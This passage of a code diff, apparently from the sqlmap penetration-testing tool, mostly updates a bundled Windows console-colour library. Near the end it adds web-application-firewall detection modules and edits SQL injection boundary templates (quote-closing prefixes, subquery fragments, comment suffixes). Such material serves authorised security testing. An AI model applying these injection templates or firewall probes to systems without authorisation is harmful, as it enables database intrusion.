-Fore = AnsiCodes( AnsiFore )
+Fore   = AnsiFore()
-Back = AnsiCodes( AnsiBack )
+Back   = AnsiBack()
-Style = AnsiCodes( AnsiStyle )
+Style  = AnsiStyle()
-
+Cursor = AnsiCursor()

thirdparty/colorama/ansitowin32.py

@@ -1,16 +1,22 @@
-
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
 import re
 import sys
+import os
 
 from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style
 from .winterm import WinTerm, WinColor, WinStyle
-from .win32 import windll
+from .win32 import windll, winapi_test
 
 
+winterm = None
 if windll is not None:
     winterm = WinTerm()
 
 
+def is_stream_closed(stream):
+    return not hasattr(stream, 'closed') or stream.closed
+
+
 def is_a_tty(stream):
     return hasattr(stream, 'isatty') and stream.isatty()
 
@@ -40,7 +46,8 @@ class AnsiToWin32(object):
     sequences from the text, and if outputting to a tty, will convert them into
     win32 function calls.
     '''
-    ANSI_RE = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
+    ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?')     # Control Sequence Introducer
+    ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?')         # Operating System Command
 
     def __init__(self, wrapped, convert=None, strip=None, autoreset=False):
         # The wrapped stream (normally sys.stdout or sys.stderr)
@@ -52,16 +59,21 @@ class AnsiToWin32(object):
         # create the proxy wrapping our output stream
         self.stream = StreamWrapper(wrapped, self)
 
-        on_windows = sys.platform.startswith('win')
+        on_windows = os.name == 'nt'
+        # We test if the WinAPI works, because even if we are on Windows
+        # we may be using a terminal that doesn't support the WinAPI
+        # (e.g. Cygwin Terminal). In this case it's up to the terminal
+        # to support the ANSI codes.
+        conversion_supported = on_windows and winapi_test()
 
         # should we strip ANSI sequences from our output?
         if strip is None:
-            strip = on_windows
+            strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped))
         self.strip = strip
 
         # should we should convert ANSI sequences into win32 calls?
         if convert is None:
-            convert = on_windows and is_a_tty(wrapped)
+            convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped)
         self.convert = convert
 
         # dict of ansi codes to win32 functions and parameters
@@ -70,7 +82,6 @@ class AnsiToWin32(object):
         # are we wrapping stderr?
         self.on_stderr = self.wrapped is sys.stderr
 
-
     def should_wrap(self):
         '''
         True if this class is actually needed. If false, then the output
@@ -81,7 +92,6 @@ class AnsiToWin32(object):
         '''
         return self.convert or self.strip or self.autoreset
 
-
     def get_win32_calls(self):
         if self.convert and winterm:
             return {
@@ -98,6 +108,14 @@ class AnsiToWin32(object):
                 AnsiFore.CYAN: (winterm.fore, WinColor.CYAN),
                 AnsiFore.WHITE: (winterm.fore, WinColor.GREY),
                 AnsiFore.RESET: (winterm.fore, ),
+                AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True),
+                AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True),
+                AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True),
+                AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True),
+                AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True),
+                AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True),
+                AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True),
+                AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True),
                 AnsiBack.BLACK: (winterm.back, WinColor.BLACK),
                 AnsiBack.RED: (winterm.back, WinColor.RED),
                 AnsiBack.GREEN: (winterm.back, WinColor.GREEN),
@@ -107,8 +125,16 @@ class AnsiToWin32(object):
                 AnsiBack.CYAN: (winterm.back, WinColor.CYAN),
                 AnsiBack.WHITE: (winterm.back, WinColor.GREY),
                 AnsiBack.RESET: (winterm.back, ),
+                AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True),
+                AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True),
+                AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True),
+                AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True),
+                AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True),
+                AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True),
+                AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True),
+                AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True),
             }
-
+        return dict()
 
     def write(self, text):
         if self.strip or self.convert:
@@ -123,7 +149,7 @@ class AnsiToWin32(object):
     def reset_all(self):
         if self.convert:
             self.call_win32('m', (0,))
-        elif is_a_tty(self.wrapped):
+        elif not self.strip and not is_stream_closed(self.wrapped):
             self.wrapped.write(Style.RESET_ALL)
 
 
@@ -134,7 +160,8 @@ class AnsiToWin32(object):
         calls.
         '''
         cursor = 0
-        for match in self.ANSI_RE.finditer(text):
+        text = self.convert_osc(text)
+        for match in self.ANSI_CSI_RE.finditer(text):
             start, end = match.span()
             self.write_plain_text(text, cursor, start)
             self.convert_ansi(*match.groups())
@@ -150,21 +177,29 @@ class AnsiToWin32(object):
 
     def convert_ansi(self, paramstring, command):
         if self.convert:
-            params = self.extract_params(paramstring)
+            params = self.extract_params(command, paramstring)
             self.call_win32(command, params)
 
 
-    def extract_params(self, paramstring):
+    def extract_params(self, command, paramstring):
-        def split(paramstring):
+        if command in 'Hf':
-            for p in paramstring.split(';'):
+            params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';'))
-                if p != '':
+            while len(params) < 2:
-                    yield int(p)
+                # defaults:
-        return tuple(split(paramstring))
+                params = params + (1,)
+        else:
+            params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0)
+            if len(params) == 0:
+                # defaults:
+                if command in 'JKm':
+                    params = (0,)
+                elif command in 'ABCD':
+                    params = (1,)
+
+        return params
 
 
     def call_win32(self, command, params):
-        if params == []:
-            params = [0]
         if command == 'm':
             for param in params:
                 if param in self.win32_calls:
@@ -173,17 +208,29 @@ class AnsiToWin32(object):
                     args = func_args[1:]
                     kwargs = dict(on_stderr=self.on_stderr)
                     func(*args, **kwargs)
-        elif command in ('H', 'f'): # set cursor position
+        elif command in 'J':
-            func = winterm.set_cursor_position
+            winterm.erase_screen(params[0], on_stderr=self.on_stderr)
-            func(params, on_stderr=self.on_stderr)
+        elif command in 'K':
-        elif command in ('J'):
+            winterm.erase_line(params[0], on_stderr=self.on_stderr)
-            func = winterm.erase_data
+        elif command in 'Hf':     # cursor position - absolute
-            func(params, on_stderr=self.on_stderr)
+            winterm.set_cursor_position(params, on_stderr=self.on_stderr)
-        elif command == 'A':
+        elif command in 'ABCD':   # cursor position - relative
-            if params == () or params == None:
+            n = params[0]
-                num_rows = 1
+            # A - up, B - down, C - forward, D - back
-            else:
+            x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command]
-                num_rows = params[0]
+            winterm.cursor_adjust(x, y, on_stderr=self.on_stderr)
-            func = winterm.cursor_up
-            func(num_rows, on_stderr=self.on_stderr)
 
+
+    def convert_osc(self, text):
+        for match in self.ANSI_OSC_RE.finditer(text):
+            start, end = match.span()
+            text = text[:start] + text[end:]
+            paramstring, command = match.groups()
+            if command in '\x07':       # \x07 = BEL
+                params = paramstring.split(";")
+                # 0 - change title and icon (we will only change title)
+                # 1 - change icon (we don't support this)
+                # 2 - change title
+                if params[0] in '02':
+                    winterm.set_title(params[1])
+        return text

thirdparty/colorama/initialise.py

@@ -1,32 +1,48 @@
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
 import atexit
+import contextlib
 import sys
 
 from .ansitowin32 import AnsiToWin32
 
 
-orig_stdout = sys.stdout
+orig_stdout = None
-orig_stderr = sys.stderr
+orig_stderr = None
 
-wrapped_stdout = sys.stdout
+wrapped_stdout = None
-wrapped_stderr = sys.stderr
+wrapped_stderr = None
 
 atexit_done = False
 
 
 def reset_all():
-    AnsiToWin32(orig_stdout).reset_all()
+    if AnsiToWin32 is not None:    # Issue #74: objects might become None at exit
+        AnsiToWin32(orig_stdout).reset_all()
 
 
 def init(autoreset=False, convert=None, strip=None, wrap=True):
+    global wrapped_stdout, wrapped_stderr
+    global orig_stdout, orig_stderr
+
+    if orig_stdout is not None:
+        return
 
     if not wrap and any([autoreset, convert, strip]):
         raise ValueError('wrap=False conflicts with any other arg=True')
 
-    global wrapped_stdout, wrapped_stderr
+    orig_stdout = sys.stdout
-    sys.stdout = wrapped_stdout = \
+    orig_stderr = sys.stderr
-        wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
+
-    sys.stderr = wrapped_stderr = \
+    if sys.stdout is None:
-        wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
+        wrapped_stdout = None
+    else:
+        sys.stdout = wrapped_stdout = \
+            wrap_stream(orig_stdout, convert, strip, autoreset, wrap)
+    if sys.stderr is None:
+        wrapped_stderr = None
+    else:
+        sys.stderr = wrapped_stderr = \
+            wrap_stream(orig_stderr, convert, strip, autoreset, wrap)
 
     global atexit_done
     if not atexit_done:
@@ -35,13 +51,31 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
 
 
 def deinit():
-    sys.stdout = orig_stdout
+    global orig_stdout
-    sys.stderr = orig_stderr
+    global orig_stderr
+
+    if orig_stdout is not None:
+        sys.stdout = orig_stdout
+        orig_stdout = None
+    if orig_stderr is not None:
+        sys.stderr = orig_stderr
+        orig_stderr = None
+
+
+@contextlib.contextmanager
+def colorama_text(*args, **kwargs):
+    init(*args, **kwargs)
+    try:
+        yield
+    finally:
+        deinit()
 
 
 def reinit():
-    sys.stdout = wrapped_stdout
+    if wrapped_stdout is not None:
-    sys.stderr = wrapped_stdout
+        sys.stdout = wrapped_stdout
+    if wrapped_stderr is not None:
+        sys.stderr = wrapped_stderr
 
 
 def wrap_stream(stream, convert, strip, autoreset, wrap):

thirdparty/colorama/win32.py

@@ -1,51 +1,30 @@
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
 
 # from winbase.h
 STDOUT = -11
 STDERR = -12
 
 try:
-    from ctypes import windll
+    import ctypes
-except ImportError:
+    from ctypes import LibraryLoader
+    windll = LibraryLoader(ctypes.WinDLL)
+    from ctypes import wintypes
+except (AttributeError, ImportError):
     windll = None
     SetConsoleTextAttribute = lambda *_: None
+    winapi_test = lambda *_: None
 else:
-    from ctypes import (
+    from ctypes import byref, Structure, c_char, POINTER
-        byref, Structure, c_char, c_short, c_uint32, c_ushort
-    )
 
-    handles = {
+    COORD = wintypes._COORD
-        STDOUT: windll.kernel32.GetStdHandle(STDOUT),
-        STDERR: windll.kernel32.GetStdHandle(STDERR),
-    }
-
-    SHORT = c_short
-    WORD = c_ushort
-    DWORD = c_uint32
-    TCHAR = c_char
-
-    class COORD(Structure):
-        """struct in wincon.h"""
-        _fields_ = [
-            ('X', SHORT),
-            ('Y', SHORT),
-        ]
-
-    class  SMALL_RECT(Structure):
-        """struct in wincon.h."""
-        _fields_ = [
-            ("Left", SHORT),
-            ("Top", SHORT),
-            ("Right", SHORT),
-            ("Bottom", SHORT),
-        ]
 
     class CONSOLE_SCREEN_BUFFER_INFO(Structure):
         """struct in wincon.h."""
         _fields_ = [
             ("dwSize", COORD),
             ("dwCursorPosition", COORD),
-            ("wAttributes", WORD),
+            ("wAttributes", wintypes.WORD),
-            ("srWindow", SMALL_RECT),
+            ("srWindow", wintypes.SMALL_RECT),
             ("dwMaximumWindowSize", COORD),
         ]
         def __str__(self):
@@ -57,20 +36,83 @@ else:
                 , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X
             )
 
+    _GetStdHandle = windll.kernel32.GetStdHandle
+    _GetStdHandle.argtypes = [
+        wintypes.DWORD,
+    ]
+    _GetStdHandle.restype = wintypes.HANDLE
+
+    _GetConsoleScreenBufferInfo = windll.kernel32.GetConsoleScreenBufferInfo
+    _GetConsoleScreenBufferInfo.argtypes = [
+        wintypes.HANDLE,
+        POINTER(CONSOLE_SCREEN_BUFFER_INFO),
+    ]
+    _GetConsoleScreenBufferInfo.restype = wintypes.BOOL
+
+    _SetConsoleTextAttribute = windll.kernel32.SetConsoleTextAttribute
+    _SetConsoleTextAttribute.argtypes = [
+        wintypes.HANDLE,
+        wintypes.WORD,
+    ]
+    _SetConsoleTextAttribute.restype = wintypes.BOOL
+
+    _SetConsoleCursorPosition = windll.kernel32.SetConsoleCursorPosition
+    _SetConsoleCursorPosition.argtypes = [
+        wintypes.HANDLE,
+        COORD,
+    ]
+    _SetConsoleCursorPosition.restype = wintypes.BOOL
+
+    _FillConsoleOutputCharacterA = windll.kernel32.FillConsoleOutputCharacterA
+    _FillConsoleOutputCharacterA.argtypes = [
+        wintypes.HANDLE,
+        c_char,
+        wintypes.DWORD,
+        COORD,
+        POINTER(wintypes.DWORD),
+    ]
+    _FillConsoleOutputCharacterA.restype = wintypes.BOOL
+
+    _FillConsoleOutputAttribute = windll.kernel32.FillConsoleOutputAttribute
+    _FillConsoleOutputAttribute.argtypes = [
+        wintypes.HANDLE,
+        wintypes.WORD,
+        wintypes.DWORD,
+        COORD,
+        POINTER(wintypes.DWORD),
+    ]
+    _FillConsoleOutputAttribute.restype = wintypes.BOOL
+
+    _SetConsoleTitleW = windll.kernel32.SetConsoleTitleA
+    _SetConsoleTitleW.argtypes = [
+        wintypes.LPCSTR
+    ]
+    _SetConsoleTitleW.restype = wintypes.BOOL
+
+    handles = {
+        STDOUT: _GetStdHandle(STDOUT),
+        STDERR: _GetStdHandle(STDERR),
+    }
+
+    def winapi_test():
+        handle = handles[STDOUT]
+        csbi = CONSOLE_SCREEN_BUFFER_INFO()
+        success = _GetConsoleScreenBufferInfo(
+            handle, byref(csbi))
+        return bool(success)
+
     def GetConsoleScreenBufferInfo(stream_id=STDOUT):
         handle = handles[stream_id]
         csbi = CONSOLE_SCREEN_BUFFER_INFO()
-        success = windll.kernel32.GetConsoleScreenBufferInfo(
+        success = _GetConsoleScreenBufferInfo(
             handle, byref(csbi))
         return csbi
 
-
     def SetConsoleTextAttribute(stream_id, attrs):
         handle = handles[stream_id]
-        return windll.kernel32.SetConsoleTextAttribute(handle, attrs)
+        return _SetConsoleTextAttribute(handle, attrs)
 
-
+    def SetConsoleCursorPosition(stream_id, position, adjust=True):
-    def SetConsoleCursorPosition(stream_id, position):
         position = COORD(*position)
         # If the position is out of range, do nothing.
         if position.Y <= 0 or position.X <= 0:
@@ -79,31 +121,34 @@ else:
         #    1. being 0-based, while ANSI is 1-based.
         #    2. expecting (x,y), while ANSI uses (y,x).
         adjusted_position = COORD(position.Y - 1, position.X - 1)
-        # Adjust for viewport's scroll position
+        if adjust:
-        sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
+            # Adjust for viewport's scroll position
-        adjusted_position.Y += sr.Top
+            sr = GetConsoleScreenBufferInfo(STDOUT).srWindow
-        adjusted_position.X += sr.Left
+            adjusted_position.Y += sr.Top
+            adjusted_position.X += sr.Left
         # Resume normal processing
         handle = handles[stream_id]
-        return windll.kernel32.SetConsoleCursorPosition(handle, adjusted_position)
+        return _SetConsoleCursorPosition(handle, adjusted_position)
 
     def FillConsoleOutputCharacter(stream_id, char, length, start):
         handle = handles[stream_id]
-        char = TCHAR(char)
+        char = c_char(char.encode())
-        length = DWORD(length)
+        length = wintypes.DWORD(length)
-        num_written = DWORD(0)
+        num_written = wintypes.DWORD(0)
         # Note that this is hard-coded for ANSI (vs wide) bytes.
-        success = windll.kernel32.FillConsoleOutputCharacterA(
+        success = _FillConsoleOutputCharacterA(
             handle, char, length, start, byref(num_written))
         return num_written.value
 
     def FillConsoleOutputAttribute(stream_id, attr, length, start):
         ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )'''
         handle = handles[stream_id]
-        attribute = WORD(attr)
+        attribute = wintypes.WORD(attr)
-        length = DWORD(length)
+        length = wintypes.DWORD(length)
-        num_written = DWORD(0)
+        num_written = wintypes.DWORD(0)
         # Note that this is hard-coded for ANSI (vs wide) bytes.
-        return windll.kernel32.FillConsoleOutputAttribute(
+        return _FillConsoleOutputAttribute(
             handle, attribute, length, start, byref(num_written))
 
+    def SetConsoleTitle(title):
+        return _SetConsoleTitleW(title)

thirdparty/colorama/winterm.py

@@ -1,4 +1,4 @@
-
+# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
 from . import win32
 
 
@@ -15,9 +15,9 @@ class WinColor(object):
 
 # from wincon.h
 class WinStyle(object):
-    NORMAL = 0x00 # dim text, dim background
+    NORMAL              = 0x00 # dim text, dim background
-    BRIGHT = 0x08 # bright text, dim background
+    BRIGHT              = 0x08 # bright text, dim background
-
+    BRIGHT_BACKGROUND   = 0x80 # dim text, bright background
 
 class WinTerm(object):
 
@@ -27,29 +27,44 @@ class WinTerm(object):
         self._default_fore = self._fore
         self._default_back = self._back
         self._default_style = self._style
+        # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
+        # So that LIGHT_EX colors and BRIGHT style do not clobber each other,
+        # we track them separately, since LIGHT_EX is overwritten by Fore/Back
+        # and BRIGHT is overwritten by Style codes.
+        self._light = 0
 
     def get_attrs(self):
-        return self._fore + self._back * 16 + self._style
+        return self._fore + self._back * 16 + (self._style | self._light)
 
     def set_attrs(self, value):
         self._fore = value & 7
         self._back = (value >> 4) & 7
-        self._style = value & WinStyle.BRIGHT
+        self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
 
     def reset_all(self, on_stderr=None):
         self.set_attrs(self._default)
         self.set_console(attrs=self._default)
 
-    def fore(self, fore=None, on_stderr=False):
+    def fore(self, fore=None, light=False, on_stderr=False):
         if fore is None:
             fore = self._default_fore
         self._fore = fore
+        # Emulate LIGHT_EX with BRIGHT Style
+        if light:
+            self._light |= WinStyle.BRIGHT
+        else:
+            self._light &= ~WinStyle.BRIGHT
         self.set_console(on_stderr=on_stderr)
 
-    def back(self, back=None, on_stderr=False):
+    def back(self, back=None, light=False, on_stderr=False):
         if back is None:
             back = self._default_back
         self._back = back
+        # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
+        if light:
+            self._light |= WinStyle.BRIGHT_BACKGROUND
+        else:
+            self._light &= ~WinStyle.BRIGHT_BACKGROUND
         self.set_console(on_stderr=on_stderr)
 
     def style(self, style=None, on_stderr=False):
@@ -76,45 +91,72 @@ class WinTerm(object):
 
     def set_cursor_position(self, position=None, on_stderr=False):
         if position is None:
-            #I'm not currently tracking the position, so there is no default.
+            # I'm not currently tracking the position, so there is no default.
-            #position = self.get_position()
+            # position = self.get_position()
             return
         handle = win32.STDOUT
         if on_stderr:
             handle = win32.STDERR
         win32.SetConsoleCursorPosition(handle, position)
 
-    def cursor_up(self, num_rows=0, on_stderr=False):
+    def cursor_adjust(self, x, y, on_stderr=False):
-        if num_rows == 0:
-            return
         handle = win32.STDOUT
         if on_stderr:
             handle = win32.STDERR
         position = self.get_position(handle)
-        adjusted_position = (position.Y - num_rows, position.X)
+        adjusted_position = (position.Y + y, position.X + x)
-        self.set_cursor_position(adjusted_position, on_stderr)
+        win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
 
-    def erase_data(self, mode=0, on_stderr=False):
+    def erase_screen(self, mode=0, on_stderr=False):
-        # 0 (or None) should clear from the cursor to the end of the screen.
+        # 0 should clear from the cursor to the end of the screen.
         # 1 should clear from the cursor to the beginning of the screen.
-        # 2 should clear the entire screen. (And maybe move cursor to (1,1)?)
+        # 2 should clear the entire screen, and move cursor to (1,1)
-        #
-        # At the moment, I only support mode 2. From looking at the API, it
-        #    should be possible to calculate a different number of bytes to clear,
-        #    and to do so relative to the cursor position.
-        if mode[0] not in (2,):
-            return
         handle = win32.STDOUT
         if on_stderr:
             handle = win32.STDERR
-        # here's where we'll home the cursor
-        coord_screen = win32.COORD(0,0)
         csbi = win32.GetConsoleScreenBufferInfo(handle)
         # get the number of character cells in the current buffer
-        dw_con_size = csbi.dwSize.X * csbi.dwSize.Y
+        cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
+        # get number of character cells before current cursor position
+        cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
+        if mode == 0:
+            from_coord = csbi.dwCursorPosition
+            cells_to_erase = cells_in_screen - cells_before_cursor
+        if mode == 1:
+            from_coord = win32.COORD(0, 0)
+            cells_to_erase = cells_before_cursor
+        elif mode == 2:
+            from_coord = win32.COORD(0, 0)
+            cells_to_erase = cells_in_screen
         # fill the entire screen with blanks
-        win32.FillConsoleOutputCharacter(handle, ord(' '), dw_con_size, coord_screen)
+        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
         # now set the buffer's attributes accordingly
-        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), dw_con_size, coord_screen );
+        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
-        # put the cursor at (0, 0)
+        if mode == 2:
-        win32.SetConsoleCursorPosition(handle, (coord_screen.X, coord_screen.Y))
+            # put the cursor where needed
+            win32.SetConsoleCursorPosition(handle, (1, 1))
+
+    def erase_line(self, mode=0, on_stderr=False):
+        # 0 should clear from the cursor to the end of the line.
+        # 1 should clear from the cursor to the beginning of the line.
+        # 2 should clear the entire line.
+        handle = win32.STDOUT
+        if on_stderr:
+            handle = win32.STDERR
+        csbi = win32.GetConsoleScreenBufferInfo(handle)
+        if mode == 0:
+            from_coord = csbi.dwCursorPosition
+            cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
+        if mode == 1:
+            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
+            cells_to_erase = csbi.dwCursorPosition.X
+        elif mode == 2:
+            from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
+            cells_to_erase = csbi.dwSize.X
+        # fill the entire screen with blanks
+        win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
+        # now set the buffer's attributes accordingly
+        win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
+
+    def set_title(self, title):
+        win32.SetConsoleTitle(title)

thirdparty/pagerank/pagerank.py

@@ -14,14 +14,15 @@
 
 import sys
 import urllib
+import urllib2
 
-def get_pagerank(url):
+def get_pagerank(url, timeout=10):
     url = url.encode('utf8') if isinstance(url, unicode) else url
     _ = 'http://toolbarqueries.google.com/tbr?client=navclient-auto&features=Rank&ch=%s&q=info:%s' % (check_hash(hash_url(url)), urllib.quote(url))
     try:
-        f = urllib.urlopen(_)
+        req = urllib2.Request(_)
-        rank = f.read().strip()[9:]
+        rank = urllib2.urlopen(req, timeout=timeout).read().strip()[9:]
-    except Exception:
+    except:
         rank = 'N/A'
     else:
         rank = '0' if not rank or not rank.isdigit() else rank

waf/baidu.py

@@ -18,7 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         _, headers, _ = get_page(get=vector)
         retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
-        retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
+        retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
         if retval:
             break
 

waf/nsfocus.py

@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "NSFOCUS Web Application Firewall (NSFOCUS)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        _, headers, _ = get_page(get=vector)
+        retval = re.search(r"NSFocus", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

waf/urlscan.py

@@ -16,8 +16,9 @@ def detect(get_page):
     retval = False
 
     for vector in WAF_ATTACK_VECTORS:
-        _, headers, _ = get_page(get=vector)
+        page, headers, code = get_page(get=vector)
         retval = re.search(r"Rejected-By-UrlScan", headers.get(HTTP_HEADER.LOCATION, ""), re.I) is not None
+        retval |= code != 200 and re.search(r"/Rejected-By-UrlScan", page or "", re.I) is not None
         if retval:
             break
 

xml/boundaries.xml

@@ -31,6 +31,7 @@ Tag: <boundary>
             6: TOP
             7: Table name
             8: Column name
+            9: Pre-WHERE (non-query)
 
         A comma separated list of these values is also possible.
 
@@ -80,7 +81,7 @@ Formats:
         <where>1,2</where>
         <ptype>1</ptype>
         <prefix>)</prefix>
-        <suffix></suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -89,7 +90,7 @@ Formats:
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>')</prefix>
-        <suffix></suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -98,7 +99,7 @@ Formats:
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>'</prefix>
-        <suffix></suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -107,7 +108,7 @@ Formats:
         <where>1,2</where>
         <ptype>4</ptype>
         <prefix>"</prefix>
-        <suffix></suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
     <!-- End of generic boundaries -->
 
@@ -406,7 +407,7 @@ Formats:
         <where>1,2</where>
         <ptype>1</ptype>
         <prefix></prefix>
-        <suffix>-- [RANDSTR]</suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -422,56 +423,92 @@ Formats:
     <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
     <boundary>
         <level>5</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
         <level>5</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
         <level>4</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>1</ptype>
         <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
         <level>4</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
         <level>5</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>4</ptype>
         <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
         <level>4</level>
-        <clause>1</clause>
+        <clause>9</clause>
         <where>1,2</where>
         <ptype>1</ptype>
         <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
     </boundary>
     <!-- End of pre-WHERE generic boundaries -->
 
@@ -482,7 +519,7 @@ Formats:
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -491,7 +528,7 @@ Formats:
         <where>1,2</where>
         <ptype>2</ptype>
         <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
     </boundary>
 
     <boundary>
@@ -500,7 +537,7 @@ Formats:
         <where>1,2</where>
         <ptype>1</ptype>
